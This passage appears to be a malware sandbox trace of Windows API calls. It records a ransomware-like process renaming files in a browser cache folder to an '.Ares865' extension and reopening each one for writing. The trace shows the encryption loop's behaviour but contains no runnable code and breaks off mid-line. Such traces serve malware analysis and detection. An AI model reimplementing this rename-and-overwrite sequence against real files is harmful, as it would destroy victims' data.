param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA42EP9[1].png.Ares865") returned 117 [0096.557] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA42EP9[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa42ep9[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA42EP9[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa42ep9[1].png.ares865"), dwFlags=0x1) returned 1 [0096.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA42EP9[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa42ep9[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.559] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=461) returned 1 [0096.561] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA54rQj[1].png.Ares865") returned 117 [0096.561] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA54rQj[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa54rqj[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA54rQj[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa54rqj[1].png.ares865"), dwFlags=0x1) returned 1 [0096.571] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA54rQj[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa54rqj[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.571] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=401) returned 1 [0096.581] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA61yi9[1].png.Ares865") returned 117 [0096.581] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA61yi9[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa61yi9[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA61yi9[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa61yi9[1].png.ares865"), dwFlags=0x1) returned 1 [0096.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA61yi9[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa61yi9[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=413) returned 1 [0096.596] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA8uCo4[1].png.Ares865") returned 117 [0096.596] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA8uCo4[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa8uco4[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA8uCo4[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa8uco4[1].png.ares865"), dwFlags=0x1) returned 1 [0096.597] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AA8uCo4[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aa8uco4[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.597] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=712) returned 1 [0096.605] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AAdAVrM[1].png.Ares865") returned 117 [0096.605] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AAdAVrM[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aadavrm[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AAdAVrM[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aadavrm[1].png.ares865"), dwFlags=0x1) returned 1 [0096.606] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\AAdAVrM[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\aadavrm[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.606] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=834) returned 1 [0096.611] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\adServer[1].htm.Ares865") returned 118 [0096.611] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\adServer[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\adserver[1].htm"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\adServer[1].htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\adserver[1].htm.ares865"), dwFlags=0x1) returned 1 [0096.612] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\adServer[1].htm.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\adserver[1].htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.613] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8679) returned 1 [0096.616] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\advertisement.ad[1].js.Ares865") returned 125 [0096.616] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\advertisement.ad[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\advertisement.ad[1].js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\advertisement.ad[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\advertisement.ad[1].js.ares865"), dwFlags=0x1) returned 1 [0096.617] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\advertisement.ad[1].js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\advertisement.ad[1].js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.618] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28) returned 1 [0096.622] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[1].Ares865") returned 120 [0096.622] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[1].ares865"), dwFlags=0x1) returned 1 [0096.623] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.624] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1035) returned 1 [0096.629] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[2].Ares865") returned 120 [0096.629] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[2]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[2]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[2].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[2].ares865"), dwFlags=0x1) returned 1 [0096.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[2].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[2].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.630] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1332) returned 1 [0096.634] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[3].Ares865") returned 120 [0096.634] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[3]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[3]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[3].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[3].ares865"), dwFlags=0x1) returned 1 [0096.636] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\async_usersync[3].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\async_usersync[3].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.636] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1330) returned 1 [0096.639] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB1CcOi[1].png.Ares865") returned 117 [0096.639] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB1CcOi[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb1ccoi[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB1CcOi[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb1ccoi[1].png.ares865"), dwFlags=0x1) returned 1 [0096.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB1CcOi[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb1ccoi[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.641] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=464) returned 1 [0096.645] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB46JmN[1].png.Ares865") returned 117 [0096.645] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB46JmN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb46jmn[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB46JmN[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb46jmn[1].png.ares865"), dwFlags=0x1) returned 1 [0096.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB46JmN[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb46jmn[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.646] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=784) returned 1 [0096.650] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kJAC[1].png.Ares865") returned 117 [0096.650] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kJAC[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5kjac[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kJAC[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5kjac[1].png.ares865"), dwFlags=0x1) returned 1 [0096.651] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kJAC[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5kjac[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.652] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=288) returned 1 [0096.657] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kTiV[1].png.Ares865") returned 117 [0096.657] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kTiV[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5ktiv[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kTiV[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5ktiv[1].png.ares865"), dwFlags=0x1) returned 1 [0096.658] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB5kTiV[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb5ktiv[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.658] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=289) returned 1 [0096.661] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB6Ma4a[1].png.Ares865") returned 117 [0096.661] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB6Ma4a[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb6ma4a[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB6Ma4a[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb6ma4a[1].png.ares865"), dwFlags=0x1) returned 1 [0096.662] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB6Ma4a[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb6ma4a[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.663] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=396) returned 1 [0096.666] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB74fLs[1].png.Ares865") returned 117 [0096.666] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB74fLs[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb74fls[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB74fLs[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb74fls[1].png.ares865"), dwFlags=0x1) returned 1 [0096.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BB74fLs[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bb74fls[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.668] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=360) returned 1 [0096.680] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBIqq8[1].jpg.Ares865") returned 117 [0096.680] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBIqq8[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbiqq8[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBIqq8[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbiqq8[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBIqq8[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbiqq8[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.683] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13119) returned 1 [0096.686] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBL0ij[1].jpg.Ares865") returned 117 [0096.687] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBL0ij[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbl0ij[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBL0ij[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbbl0ij[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBBL0ij[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js 